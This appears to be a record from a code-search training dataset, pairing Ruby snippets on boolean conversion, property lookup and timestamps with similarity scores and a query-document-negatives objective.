"def define_property(property, value)\n define_singleton_method(property) { value }\n\n if value == true || value == false\n define_singleton_method(\"#{property}?\") { value }\n end\n end",
"def single_value?\n return false\n end",
"def is_value?\n true\n end",
"def boolean_field_value_for_name(name)\n return boolean_fields[name.to_s][\"value\"].to_i if boolean_fields[name.to_s]\n return BOOLEAN_VALUE_FOR_ALL # if no name found\n end",
"def to_boolean(value)\n case value\n when :true, 'true'\n true\n else\n false\n end\n end",
"def to_boolean()\n res = super(context,self)\n return res\n end",
"def value_if_true=(value)\n @value_if_true = value\n end",
"def to_bool\n return true if ['true', '1', 'yes', 'on', 't'].include? self\n return false if ['false', '0', 'no', 'off', 'f'].include? self\n return false\n end",
"def to_bool\n return false if self.downcase == \"false\"\n return true\n end",
"def property?(prop_name)\n return false if properties_info[prop_name.to_sym].nil?\n properties_info[prop_name.to_sym][:defined] == true\n end",
"def value?(value) true end",
"def true?\n self == true\n end",
"def checkbox_value\n show\n # return 'true' if show\n # 'false'\n end",
"def typus_boolean(attribute = 'default')\n boolean = Typus::Configuration.config[self.name]['fields']['options']['booleans'][attribute] rescue nil\n boolean = \"true, false\" if boolean.nil?\n return { :true => boolean.split(', ').first.humanize, \n :false => boolean.split(', ').last.humanize }\n end",
"def display_boolean(value)\n value == \"true\" ? \"Yes\" : \"No\"\n end",
"def to_bool\n if (self.to_bool == 1)\n puts \"TRUE\"\n elsif (self.to_bool == 0)\n puts \"FALSE\"\n elsif (self.to_bool == -1)\n puts \"NaN\"\n end\nend",
"def literal_false\n BOOL_FALSE\n end",
"def property?(prop_name)\n return false if properties_info[prop_name.to_sym].nil?\n properties_info[prop_name.to_sym][:defined] == true\n end",
"def property?(name)\n raw.key? name\n end",
"def boolify(val)\n\nend",
"def boolean?\n !to_bool.nil?\n end",
"def boolean?\n type == \"BOOLEAN\" || type == \"BOOL\"\n end",
"def get_boolean value #:nodoc:\n # some exceptions\n value = false if value == :low or value == 0 or value == nil or value == :off or value == :ground or value == :gnd\n !! value # double invert value in to boolean form\n end",
"def to_bool\n !!self\n end",
"def hasValue\n @valueCreator.hasValue\n end",
"def property?(key)\n has_property?(key.to_s)\n end",
"def attribute?\n false\n end",
"def column_value_boolean\n case Utilities.adapter\n when 'mysql2', 'postgresql'\n column_value ? \"true\" : \"false\"\n when 'sqlite3', 'sqlserver'\n column_value ? \"1\" : \"0\"\n end\n end",
"def to_boolean\r\n\t !!(self.to_s =~ /^(true|t|yes|y|1)$/i)\r\n\tend",
"def typecast_value_boolean(opts={});true;end",
"def enabled\n if @property_hash[:enabled].nil?\n :absent\n else\n @property_hash[:enabled]\n end\n end",
"def has_value?\n true\n end",
"def notify_boolean(value)\n value.present? ? 'yes' : 'no'\n end",
"def acwake\n return nil unless @property_hash.has_key? 'acwake'\n return nil unless @property_hash['acwake'] == '0' || @property_hash['acwake'] == '1'\n \n @property_hash['acwake'] == '1' ? :true : :false\n end",
"def toread\n Types::Boolean.deserialize(@toread)\n end",
"def field_value\n checked?\n end",
"def to_bool(value)\n value.to_s.downcase == 'true' ? true : false\n end",
"def to_boolean\n if ['true', 'True', 'TRUE', '1'].include?(self)\n return true\n else\n return false\n end\n end",
"def to_boolean(value)\n [\"true\", \"1\", \"yes\"].include?(value.to_s) ? true : false\n end",
"def infer_boolean bool_property, indicator_properties, atts, default=nil\n atts[bool_property] = default unless (atts[bool_property] or default.nil?)\n indicator_properties.each do |x|\n atts[bool_property] = true unless atts[x].nil?\n end\n return atts\n end",
"def bool_value(value)\n value = @filters[value] if value.is_a? Symbol\n ActiveRecord::Type::Boolean.new.cast(value)\n end",
"def to_cli_boolean(value)\n case value\n when true\n :true\n else\n :false\n end\n end",
"def boolean_type?(resource)\n property = get_resource_property(resource, attribute_name)\n\n property ? property.load_as == TrueClass : false\n end",
"def true?\n !false?\n end",
"def to_boolean(val)\n val && (val.to_s.match(/(true|t|yes|y|1)$/i) != nil)\n end",
"def literal_false\n 'false'\n end",
"def prop(name)\n properties.named(name).first.andand.value\n end"
] | [
"0.8717523",
"0.8130486",
"0.7639224",
"0.7368131",
"0.7304756",
"0.72858953",
"0.7130745",
"0.71062964",
"0.70823854",
"0.70806104",
"0.70732677",
"0.7058283",
"0.7040332",
"0.7040332",
"0.70148027",
"0.69839317",
"0.6981775",
"0.6970699",
"0.6967798",
"0.69629",
"0.6949662",
"0.6892146",
"0.68921065",
"0.6889565",
"0.6873876",
"0.68688977",
"0.6863598",
"0.68497026",
"0.6807683",
"0.68011427",
"0.6786838",
"0.6784786",
"0.678248",
"0.6770719",
"0.67441386",
"0.67342955",
"0.67335135",
"0.6726452",
"0.67140114",
"0.67069215",
"0.6698589",
"0.66713685",
"0.66712946",
"0.6669009",
"0.6665321",
"0.6661011",
"0.6654483",
"0.6649265",
"0.66407716",
"0.66358715",
"0.6619414",
"0.6615432",
"0.66132337",
"0.6604121",
"0.66030735",
"0.6578533",
"0.6563173",
"0.6561158",
"0.65577966",
"0.655683",
"0.6543939",
"0.6541288",
"0.6539885",
"0.65174085",
"0.6511421",
"0.65104777",
"0.6502326",
"0.64963245",
"0.6492959",
"0.6489123",
"0.64874136",
"0.64802235",
"0.64759016",
"0.6470251",
"0.6457401",
"0.64538395",
"0.64497936",
"0.6444201",
"0.64354223",
"0.6433421",
"0.64264125",
"0.64143765",
"0.64132714",
"0.6409342",
"0.64085966",
"0.6402393",
"0.6402252",
"0.6400838",
"0.6397114",
"0.6395396",
"0.6393898",
"0.63837945",
"0.63737905",
"0.6354263",
"0.6347977",
"0.6334049",
"0.63328385",
"0.63316333",
"0.63243926",
"0.6323754"
] | 0.807006 | 2 |
Returns a DateTime instance for a timestamp property | def get_date(property, data, single: true)
get_property(property, data, single: single) do |value, _type|
DateTime.parse(value)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def timestamp\n Time.parse( props[ TIMESTAMP_PROP_NAME ] ) if props\n end",
"def timestamp\n timestamp_to_datetime(static_data(\"timestamp\"))\n end",
"def datetime_timestamp\n return Date.parse(self.date).to_time\n end",
"def timestamp\n _timestamp.as_time\n end",
"def timestamp_property(name)\n val = property(name)\n if val && (not val.kind_of? Time)\n val = (not val.empty?) ? Time.parse(val) : nil\n property_cache[name] = val\n end\n val\n end",
"def timestamp\n @timestamp ||= Time.parse(self['timestamp'])\n end",
"def timestamp\n attribute_prop(4)\n end",
"def timestamp\n _timestamp.as_time\n end",
"def timestamp\n Time.at((attributes[:timestamp] || Time.now).to_i)\n end",
"def timestamp\n TimeStamp.new\n end",
"def get_datetime(timestamp)\n t = Time.at(timestamp)\n \"%d-%d-%d %d:%d:%d\" % [t.year, t.month, t.day, t.hour, t.min, t.sec]\n end",
"def new_timestamp # :nodoc:\n @properties['timestamp'].dup\n end",
"def timestamp_to_datetime(timestamp)\n Time.at(timestamp.to_f / 1000.0).utc\n end",
"def timestamp\n self[:timestamp]\n end",
"def timestamp\n @timestamp ||= Time.now.xs_datetime\n end",
"def literal_datetime(v)\n v.strftime(\"TIMESTAMP '%Y-%m-%d %H:%M:%S'\")\n end",
"def timestamp\n @timestamp ||= Time.parse(@origdate)\n end",
"def timestamp\n @timestamp ||= @attributes['timestamp'] ? Time.zone.at(@attributes['timestamp']) : nil\n end",
"def timestamp\n @timestamp ||= @attributes['timestamp'] ? Time.zone.at(@attributes['timestamp']) : nil\n end",
"def type_literal_generic_datetime(column)\n :timestamp\n end",
"def timestamp(value)\n merge(timestamp: value.iso8601)\n end",
"def literal_datetime(v)\n v.strftime(TIMESTAMP_FORMAT)\n end",
"def timestamp\n self.created_at.to_s(:db)\n end",
"def timestamp_to_date(timestamp)\n\t\tTime.at(timestamp/1000).utc #This is a time instance, it should go straight ot ruby\n\tend",
"def timestamp\n mask = class_trait[:timestamp]\n Time.now.strftime(mask || \"%Y-%m-%d %H:%M:%S\")\n end",
"def timestamp\n first(:timestamp)\n end",
"def created_at\n attributes.send(:ts_created) rescue nil\n end",
"def time\n Time.parse(@timestamp)\n end",
"def timestamp \n\ttime = Time.new\n\t\"#{time.day}/#{time.month}/#{time.year}\"\nend",
"def get_date(timestamp)\n get_time(timestamp).to_date\n end",
"def createTimestamp\n result = @@create_date[name]\n result ||= attrs['createTimestamp'][0] rescue nil # in case not loaded\n result ||= ASF.search_one(base, \"uid=#{name}\", 'createTimestamp')[0][0]\n result\n end",
"def timestamp\n DateTime.now.strftime(\"%Y%m%d%H%M%S\")\n end",
"def timestamp() @timestamp ||= Time.now.strftime(\"%Y%m%d%H%M%SZ\") end",
"def time_modified(t=nil)\n if t.nil?\n t = DateTime.now.new_offset(0)\n elsif t.is_a? String\n t = DateTime.parse(t).new_offset(0)\n elsif t.is_a? Time\n t = t.utc\n elsif t.is_a? Date\n t = t.to_datetime.new_offset(0)\n elsif t.is_a? DateTime\n t = t.new_offset(0)\n end\n RDF::Literal.new(t, :datatype => RDF::XSD.dateTime)\n end",
"def to_datetime()\n #This is a stub, used for indexing\n end",
"def datetime_stamp\n Time.now.utc.iso8601\n end",
"def set_for_time timestamp\n return nil unless @date\n case timestamp[0,2]\n when \"00\"\n @datetime.hour == 23 ? @date_add_1_hr : @date\n when \"23\"\n @datetime.hour == 00 ? @date_1_hr_ago : @date\n else\n @date\n end\n end",
"def timestamp_to_time(timestamp)\n Time.at(timestamp.nanos * 10**-9 + timestamp.seconds)\n end",
"def time_based_attribute\n return @time_based_attribute\n end",
"def to_datetime\n @date_time_value\n end",
"def at\n Timestamp.utc(@timestamp_value)\n end",
"def timestamp # :nodoc:\n @timestamp.dup\n end",
"def timestamp=(time)\n @timestamp = time.is_a?(Time) ? time.to_f : time\n end",
"def time_as_timestamp\n date = @date\n if @date.kind_of? String\n date = Date.parse(@date).to_time.to_i\n end\n\n date\n end",
"def timestamp(datetime)\n if datetime.respond_to?(:strftime)\n time_tag(datetime,\n format_date(datetime,\n :format => :full_date,\n :time => true\n ),\n :pubdate => true\n )\n end\n end",
"def timestamp\n time.strftime formatter\n end",
"def create_timestamp\n self.created_at = Time.now\n end",
"def create_timestamp\n self.created_at = Time.now\n end",
"def literal_time(v)\n v.strftime(\"TIMESTAMP '%Y-%m-%d %H:%M:%S'\")\n end",
"def datetime(s)\n @db.to_application_timestamp(s)\n end",
"def timestamp=(timestamp)\n @timestamp = _check_timestamp(timestamp)\n end",
"def timestamp\n return result.created_at\n end",
"def timestamp t\n\n\t\t::Pantheios::Core.timestamp t, nil\n\tend",
"def timestamps!\n key :created_at, Time\n key :updated_at, Time\n class_eval { before_save :update_timestamps }\n end",
"def update_timestamp(*_args)\n current_time = current_time_from_proper_timezone\n\n write_attribute('updated_at', current_time) if respond_to?(:updated_at)\n write_attribute('updated_on', current_time) if respond_to?(:updated_on)\n end",
"def timestamps(opts={})\n @attrs[:created_at] = Attributes::DatetimeAttr.new(:created_at, opts)\n @attrs[:updated_at] = Attributes::DatetimeAttr.new(:updated_at, opts)\n nil\n end",
"def timestamp\n @data['when'].to_time\n end",
"def to_time()\n #This is a stub, used for indexing\n end",
"def timestamp\n #data[\"timestamp\"] as? TimeInterval ?? 0\n timestamp = data[\"timestamp\"]\n timestamp.to_i || 0\n end",
"def timestamp=(timestamp)\n @timestamp = _check_timestamp(timestamp)\n end",
"def timestamp\n nil\n end",
"def to_datetime\n ::DateTime.new(@year, @month, @day, @hour, @minute, @second)\n end",
"def ruby_value\n to_datetime\n end",
"def timestamp\n date.strftime(\"%Y%m%d%H%M%S\") \n end",
"def convert_for_timestamp_shape(arg)\n return nil if arg.nil?\n\n time_value = case arg\n when Time\n arg\n when Date, DateTime\n arg.to_time\n when Integer, Float\n Time.at(arg)\n else\n Time.parse(arg.to_s)\n end\n time_value.utc.iso8601\n end",
"def typecast_value_datetime(value)\n Sequel.typecast_to_application_timestamp(value)\n end",
"def timestamp\n {\n \"u:Timestamp\" => {\n \"u:Created\" => now.xs_datetime,\n \"u:Expires\" => (now + 60 * 5).xs_datetime,\n :order! => [\"u:Created\", \"u:Expires\"],\n },\n :attributes! => { \"u:Timestamp\" => { \"u:Id\" => timestamp_id, \"xmlns:u\" => WSUNamespace } },\n }\n end",
"def to_datetime\n self\n end",
"def to_time\n Chronic.parse self.timestamp\n end",
"def timestamp\n if $jsdb.exist?(@jslib,@jscell)\n $jsdb.get_timestamp(@jslib,@jscell)\n else\n Rake::EARLY\n end\n end",
"def timestamp\n @java.getTimestamp\n end",
"def to_time\n if latest?\n Time.new(10_000, 1, 1)\n elsif timestamp?\n if development?\n self =~ /\\w+_(\\d\\d\\d\\d)_(\\d\\d)_(\\d\\d)_(\\d\\d)_(\\d\\d)$/\n Time.new(Regexp.last_match[1], Regexp.last_match[2], Regexp.last_match[3], Regexp.last_match[4], Regexp.last_match[5])\n else\n self =~ /Rel(\\d\\d\\d\\d)(\\d\\d)(\\d\\d)/\n Time.new(Regexp.last_match[1], Regexp.last_match[2], Regexp.last_match[3])\n end\n else\n fail \"Version tag #{self} cannot be converted to a time!\"\n end\n end",
"def timestamp\n @timestamp ||= Time.now.strftime Savon::SOAP::DateTimeFormat\n end",
"def set_deleted_timestamp(time=nil)\n field = model.deleted_timestamp_field\n meth = :\"#{field}=\"\n if respond_to?(field) && respond_to?(meth) && (model.deleted_timestamp_overwrite? || send(field).nil?)\n self.send(meth, time||=Sequel.datetime_class.now)\n self.save\n end\n end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def created_at\n with_type!(Fixnum) { attribute_from_model(:created_at) || attribute_from_model(:created) }\n end",
"def to_datetime\n to_time.to_datetime\n end",
"def timestamps(*attrs)\n if attrs.empty?\n DEFAULT_TIMESTAMPS.each do |t|\n attribute t, DateTime, default: proc { DateTime.now }\n end\n else\n attrs.each do |attr|\n attribute attr, DateTime, default: proc { DateTime.now }\n end\n end\n end",
"def get_timestamp\n Time.now.strftime('%d %B %Y %H:%M')\n end",
"def time\n @time ||= Time.at( timestamp / 1_000_000.0 )\n end",
"def literal_time(v)\n v.strftime(TIMESTAMP_FORMAT)\n end",
"def timestamps(options = {})\n attribute(:created_at, options.update(type: :timestamp))\n attribute(:updated_at, options.update(type: :timestamp))\n end",
"def created_at=(val)\n if val.is_a?(String)\n @created_at = Time.parse(val)\n else\n @created_at = val\n end\n end",
"def timestamps\n opts = @table.schema.opts\n if opts[ :mysql_timestamps ]\n # Unfortunately, MySQL allows only either automatic create timestamp\n # (DEFAULT CURRENT_TIMESTAMP) or automatic update timestamp (DEFAULT\n # CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP), but not both - one\n # has to be updated manually anyway. So we choose to have the update timestamp\n # automatically updated, and let the create one to be set manually.\n # Also, Sequel doesn't currently honor :on_update for column definitions,\n # so we have to use default literal to make it work. Sigh.\n timestamp :create_time, :null => false, :default => ( opts[ :zero_timestamps ] == false ? DEFAULT_TIME : ZERO_TIME )\n timestamp :update_time, :null => false, :default => Sequel.lit( 'CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP' )\n else\n Time :create_time\n Time :update_time\n end\n end",
"def time_for(record)\n return nil unless record\n case database_type\n when :mongo\n return Time.at(record['ts'].seconds)\n when :toku\n return record['ts']\n end\n end",
"def created_at\n return DateTime.parse(@created_at) if @created_at\n\n @created_at\n end",
"def to_time\n value\n end",
"def get_timestamp\n timestamp = Time.now.gmtime\n timestamp = timestamp.strftime(\"%Y-%m-%dT%H:%M:%S.000Z\")\n timestamp.to_s\n end",
"def timestamp(attachment, _style_name)\n attachment.instance_read(:updated_at).in_time_zone(attachment.time_zone).to_s\n end",
"def timestamp\n Time.now.to_s\n end",
"def datetime(name, option={})\n option[:is_a] = :datetime\n register_attribute_member(name, option)\n define_attribute_accessor(name, option)\n define_validations(name, option)\n end",
"def datetime\n new(:datetime, DATE_TIME_REGEXP, lambda { |raw| Time.parse(raw).to_datetime })\n end",
"def timestamps!\n property :created_at\n property :updated_at\n \n before_create :touch_created_at\n before_create :touch_updated_at\n before_save :touch_updated_at\n end",
"def to_timestamp(obj, default = Time.now)\n case obj\n when String then Time.parse(obj)\n when Date then obj.to_time\n when Time then obj\n when Numeric then Time.at(obj)\n else default\n end\n rescue ArgumentError => e\n default\n end",
"def to_timestamp_with_offset\n # Thread-safety: It is possible that the value of @timestamp_with_offset\n # may be calculated multiple times in concurrently executing threads. It\n # is not worth the overhead of locking to ensure that\n # @timestamp_with_offset is only calculated once.\n\n unless @timestamp_with_offset\n time = to_time\n @timestamp_with_offset = TimestampWithOffset.new(time.to_i, time.utc_offset)\n end\n\n @timestamp_with_offset\n end",
"def created_at=(value)\n @created_at = DateTime.parse(value)\n end"
] | [
"0.7321838",
"0.71905166",
"0.7150863",
"0.7128203",
"0.71263605",
"0.7039782",
"0.7027968",
"0.6959805",
"0.69386595",
"0.6847868",
"0.6846435",
"0.68372166",
"0.6700522",
"0.6693689",
"0.662373",
"0.6552022",
"0.653928",
"0.6507476",
"0.6507476",
"0.64569145",
"0.6407585",
"0.6387313",
"0.63795704",
"0.6332905",
"0.6317713",
"0.6301909",
"0.6289453",
"0.62668395",
"0.6216053",
"0.61787766",
"0.61427784",
"0.6097901",
"0.6084047",
"0.60653394",
"0.60375303",
"0.60308105",
"0.6023683",
"0.60162544",
"0.5981967",
"0.5980163",
"0.5977741",
"0.5974562",
"0.59685427",
"0.59633654",
"0.5956148",
"0.5935457",
"0.59299356",
"0.5929214",
"0.59148455",
"0.59078115",
"0.5895964",
"0.5891415",
"0.58910483",
"0.5883393",
"0.5847512",
"0.58034784",
"0.58001685",
"0.5799943",
"0.5799855",
"0.57944983",
"0.5792738",
"0.57856786",
"0.5777555",
"0.57712513",
"0.57706714",
"0.57649624",
"0.57562345",
"0.5754326",
"0.57529384",
"0.5732254",
"0.5709127",
"0.570798",
"0.5696043",
"0.56927943",
"0.56915486",
"0.56915486",
"0.56915486",
"0.56915486",
"0.56915486",
"0.56915486",
"0.5677962",
"0.5677884",
"0.5676219",
"0.5665357",
"0.56628054",
"0.5639369",
"0.5638702",
"0.56358796",
"0.5635018",
"0.56290835",
"0.56269157",
"0.56267893",
"0.56241345",
"0.56211877",
"0.56163615",
"0.56132215",
"0.56023",
"0.559221",
"0.5586169",
"0.5585546",
"0.55836666"
] | 0.0 | -1 |
Returns the value of a property | def get_property(property, data, is_url: false, single: true, &block)
values = data ? data[property] : nil
if values.is_a?(Array)
values = values.map do |value|
get_property_value(value, is_url: is_url, &block)
end
single ? values[0] : values
else
value = get_property_value(values, is_url: is_url, &block)
single ? value : [value]
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_property(property)\n get_compound_value(get_value(property))\n end",
"def value\n @property_hash[:value]\n end",
"def get_property _property\n send_cmd(\"get_property #{_property}\")\n end",
"def get_property(property_name)\n value = get() and value[property_name]\n end",
"def property\n @property\n end",
"def [](property_name)\n properties[property_name.to_s].value\n end",
"def get_value(property)\n if @env_properties.get_value(property)\n return @env_properties.get_value(property)\n end\n @file_properties.get_value(property)\n end",
"def prop(name)\n properties.named(name).first.andand.value\n end",
"def get(property)\n self.send(property.to_sym)\n end",
"def get_value(property_path)\n element = @tree.select(property_path)[0]\n element.nil? ? nil : element.value\n end",
"def get_property_value(name)\n property = get_property(name)\n \n # Throw error if property doesn't exist\n if property.nil?\n raise StandardError.new(\"Property does not exist: #{name}\")\n end\n\n # Return the property value\n property.get_value(self)\n end",
"def get_property(key)\n self.fetch key\n end",
"def get_property(name)\n return @properties[name]\n end",
"def get_property(*args)\n return unless alive?\n\n command(\"get_property\", *args)[\"data\"]\n end",
"def property(name)\n get(\"/session/#{session_id}/element/#{element_id}/property/#{name}\").value\n end",
"def property(name)\n @property_hash[name]\n end",
"def get_property(key)\n @data[key]\n end",
"def get_raw_property_value(name)\n return @property_values[name]\n end",
"def get_property(property_name)\n command(\"get_property\", property_name)\n end",
"def _property(p_name)\n __t_stringish(p_name)\n _jinja.properties[__attribute_key(p_name)]\n end",
"def get_property(name)\n $NEO_LOGGER.debug{\"get property '#{name}'\"}\n \n return nil if ! property?(name)\n value = @internal_node.get_property(name.to_s)\n if self.class.marshal?(name)\n Marshal.load(String.from_java_bytes(value))\n else\n value\n end\n end",
"def get_property(property)\n rows = weather_properties.select do |row|\n row.header.text.downcase == property\n end\n\n return nil if rows.empty?\n\n rows.first.value.text\n end",
"def [](property)\n data[property]\n end",
"def get_property!(node, name)\n value = node.xpath(name).text\n raise \"missing property '#{name}' in node: #{node}\" if value.empty?\n value\n end",
"def intersys_get(property)\n intersys_property(property).get\n end",
"def get(property_name)\n result.key?(property_name) ? result[property_name][1] : nil\n end",
"def get_property(property_id, options={})\n return send_message(SkyDB::Message::GetProperty.new(property_id, options))\n end",
"def get_property(prop)\r\n prop = URI.parse(prop) unless prop.is_a?(URI)\r\n\r\n each_property{|predicate, object|\r\n return object if predicate == prop\r\n }\r\n nil\r\n end",
"def property(name); end",
"def get_property\n @xml = client.call(url).parsed_response.css('property').first\n @attributes.merge!(parse_xml_to_hash)\n end",
"def get(key)\n properties[key]\n end",
"def get_property(property_name)\n function = <<~JAVASCRIPT\n (object, propertyName) => {\n const result = {__proto__: null};\n result[propertyName] = object[propertyName];\n return result;\n }\n JAVASCRIPT\n object_handle = execution_context.evaluate_handle_function(function, self, property_name).value!\n properties = object_handle.get_properties\n result = properties[property_name]\n object_handle.dispose\n result\n end",
"def property_name\n property.name if property\n end",
"def value\n send property.type_field\n end",
"def get_property(ctx,object,propertyName,exception)\n JS::Lib.JSObjectGetProperty(ctx,object,propertyName,exception)\n end",
"def get_property( propname )\n resp = conn.get('/users/'+name+'/props/'+propname+'/')\n \n case resp.code.to_i\n when 200\n return JSON.parse( resp.body )\n when 404\n case resp.header['resource-type']\n when 'user'\n raise RestAuthUserNotFound.new( resp )\n when 'property'\n raise RestAuthPropertyNotFound.new( resp )\n else\n raise RestAuthBadResponse.new( resp, \"Received 404 without Resource-Type header\" )\n end\n else\n raise RestAuthUnknownStatus.new( resp )\n end\n end",
"def get\n @value\n end",
"def property_name\n property.identifing_name\n end",
"def property property\n\t\tret = '@property '\n\n\t\tcase property.type\n\t\twhen 'int' then ret << '(nonatomic) int '\n\t\twhen 'bool' then ret << '(nonatomic) BOOL '\n\t\twhen 'flt' then ret << '(nonatomic) float '\n\t\twhen 'str' then ret << '(strong, nonatomic) NSString * '\n\t\twhen 'arr' then ret << '(strong, nonatomic) NSArray * '\n\t\twhen 'dict' then ret << '(strong, nonatomic) NSDictionary * '\n\t\telse\n\t\t\t#fallthrough: a custom object was provided\n\t\t\tret << \"(strong, nonatomic) #{property.type} * \"\n\t\tend\n\n\t\tret << property.name << \";\\n\"\n\t\tret\n\tend",
"def getProperty(propName)\n begin\n elementObject = waitForObject(@symbolicName, OBJECT_WAIT_TIMEOUT)\n @properties = Squish::Object.properties(elementObject)\n\n if @properties[propName]\n return @properties[propName]\n else\n # Property does not exist\n return nil\n end\n rescue Exception => e\n Log.TestFail(\"#{self.class.name}::#{__method__}(): \" + @symbolicName + \": \" + e.message)\n end\n end",
"def property(value)\n merge(property: value.to_s)\n end",
"def get_property(propertyName,exception = nil)\n propertyName = JS::String.create_with_utf8cstring(propertyName)\n res = super(context,self,propertyName,exception)\n\n \n val_ref = JS::Value.from_pointer_with_context(context,res)\n ret = val_ref.to_ruby\n if ret.is_a?(JS::Value)\n return check_use(ret) || is_self(ret) || ret\n else\n return check_use(ret) || ret\n end\n \n \n end",
"def property_value(property_key, default_value=nil)\n prop=property(property_key)\n if default_value && property_key=='depth'\n # we're in SQALE.... Keep the text_value\n result = (prop ? prop.text_value : nil)||default_value\n else\n result = (prop ? prop.value : nil)\n unless result\n property_definition=java_definition.getWidgetProperty(property_key)\n result = WidgetProperty.text_to_value(property_definition.defaultValue(), property_definition.type().name()) if property_definition\n end\n end\n result\n end",
"def get_property(property, data, uri = nil, is_url: false, single: true, &block)\n values = data ? data[property] : nil\n if values.is_a?(Array)\n values = values.map { |value| get_property_value(value, is_url: is_url, &block) }\n single ? values[0] : values\n else\n value = get_property_value(values, is_url: is_url, &block)\n single ? value : [value]\n end\n end",
"def property_reader(property)\n define_method \"#{property}\" do\n value = instance_variable_get(\"@#{property}\")\n if value.nil? && partial? && persisted?\n instance_variable_get(\"@#{property}\")\n else\n value\n end\n end\n end",
"def [](key)\n get_property(key)\n end",
"def property(name)\n ensure_valid\n return property_cache[name] if property_cache.include? name\n prop = self.class.properties[name]\n raise \"No such property #{name}\" if not prop\n property_cache[name] = prop.get(@model, @path)\n end",
"def attribute_get(name)\n \n name = name.to_sym\n \n if properties.has_key?(name)\n properties[name].get(self)\n else\n nil\n end\n \n end",
"def get_property_value(value, is_url: false)\n # Assume hash values are a type/value pair\n if value.is_a?(Hash)\n type = value['type']\n value = value['value']\n else\n type = nil\n end\n # Apply transformations to string properties\n value = transform(value, is_url: is_url) if value.is_a?(String)\n # If a block is present, return the result of the block\n return yield(value, type) if block_given?\n # Otherwise return the value\n value\n end",
"def get_property(name, default= \"\")\n\t\treturn @transport.get_path(\"meta\",\"properties\", name) { default }\n\tend",
"def css_value(locator, property)\n find_element(locator).css_value(property)\n end",
"def property_name\n property.display_name\n end",
"def property(prop)\n return unless @parsed.property_any_supported?(prop)\n return unless result = @parsed.public_send(prop)\n\n puts yield(result)\n end",
"def name\n @property_name\n end",
"def get_property(key, default_value = nil)\n end",
"def value\n\t\t# This bizarre construct is done in order to not be reliant\n\t\t# on the inherent assignment-order when using Property.new({...})\n\t\t# since that hash can be ordered anywhich way .daniel\n\t\tif value_id\n\t\t\tvalue_object.value\n\t\telse\t\t\t\n\t\t\t@value\n\t\tend\n\tend",
"def get_p(component, property, componentInfo=nil)\n return $marathon.getProperty(ComponentId.new(component, componentInfo), property)\nend",
"def value(attribute, document, property_hash)\n proc = property_hash[:read_proc]\n if proc\n proc.call(document)\n else\n document[attribute == :id ? :_id : attribute]\n # An alternate way is:\n #\n # document.send(attribute == :id ? :_id : attribute)\n #\n # This will work; however, it would be confusing to support\n # properties backed by model methods here if we don't do it \n # everywhere. And supporting it everywhere would be tricky.\n #\n # For example, the filtering code relies on using MongoDB to\n # search the database. If we supported properties backed by model\n # methods, filtering / searching would be more complicated and\n # expensive.\n end\n end",
"def get_property(node, name)\n node.xpath(name).text\n end",
"def [](property); end",
"def get_p(component, property, componentInfo=nil)\n return $marathon.getProperty(ComponentId.new(component, componentInfo), property)\nend",
"def css_value(prop); end",
"def fetch_property(name)\n properties.where(\"name = ?\", name).first\n end",
"def prop(field, name)\n value = nil\n unless field.nil?\n value = value_by_key(field, name)\n value = value&.html_safe if value.is_a?(String)\n end\n value\n end",
"def [](key); self.properties[key.to_s]; end",
"def get_property_value(value, is_url: false, &block)\n # Assume hash values are a type/value pair\n if value.is_a?(Hash)\n value_type = value['type']\n value = value['value']\n else\n value_type = nil\n end\n # Apply transformations to string properties\n value = transform_property_value(value, value_type, is_url: is_url) if value.is_a?(String)\n # Return the value or the result of calling the given block on the value\n block ? block.call(value, value_type) : value\n end",
"def property?(name); end",
"def [](name)\n self.persistent_class.get_property(name.to_s) rescue nil\n end",
"def record_value(record, property)\n case record\n when Hash\n record.fetch(property, record[property.field])\n when Resource\n property.get!(record)\n end\n end",
"def get\n val\n end",
"def get\n val\n end",
"def get_value name\n get name\n end",
"def name_property\n p = properties.find { |n, p| p.name_property? }\n p ? p.first : nil\n end",
"def get_property property_name\n\n begin\n\n if property_name == ''\n raise 'Property name not specified.'\n end\n\n str_uri = $product_uri + '/words/' + @filename + '/documentProperties/' + property_name\n signed_str_uri = Aspose::Cloud::Common::Utils.sign(str_uri)\n\n response_stream = RestClient.get(signed_str_uri, {:accept => 'application/json'})\n\n stream_hash = JSON.parse(response_stream)\n stream_hash['Code'] == 200 ? stream_hash['DocumentProperty'] : false\n\n rescue Exception => e\n print e\n end\n\n end",
"def get_property property_name\n \n begin\n \n if @filename == ''\n raise 'Base file not specified.'\n end\n \n if property_name == ''\n raise 'Property name not specified.'\n end\n \n str_uri = $product_uri + '/slides/' + @filename + '/documentProperties/' + property_name\n signed_str_uri = Aspose::Cloud::Common::Utils.sign(str_uri)\n \n response_stream = RestClient.get(signed_str_uri,{:accept=>'application/json'})\n \n stream_hash = JSON.parse(response_stream)\n \n if(stream_hash['Code'] == 200)\n return stream_hash['DocumentProperty']\n else\n return false\n end\n \n rescue Exception=>e\n print e\n end\n \n end",
"def [](key)\n @properties[key]\n end",
"def [](key)\n @properties[key]\n end",
"def [](key)\n @properties[key]\n end",
"def get_property(name)\n Config::Collection.get(name)\n end",
"def get_site_property( site_id, property_name )\n client = prepare_request( @service_wsdl )\n\n response = do_request_and_handle_errors do\n client.request :get_site_property do |soap|\n soap.body = {:sessionid => @session, :siteid => site_id, :propname => property_name}\n end\n end\n\n result = response.to_hash[:get_site_property_response][:get_site_property_return]\n\n (result.kind_of? Hash) ? (return false) : (return true)\n end",
"def get(value)\n value\n end",
"def property(name)\n (obj = @parameters[name.intern] and obj.is_a?(Puppet::Property)) ? obj : nil\n end",
"def current_property\n @property = Property.find(params[:id])\n end",
"def get_value\n @value\n end",
"def prop_expr( field )\n\t\t\treturn Sequel.pg_jsonb( :prop ).get_text( field.to_s )\n\t\tend",
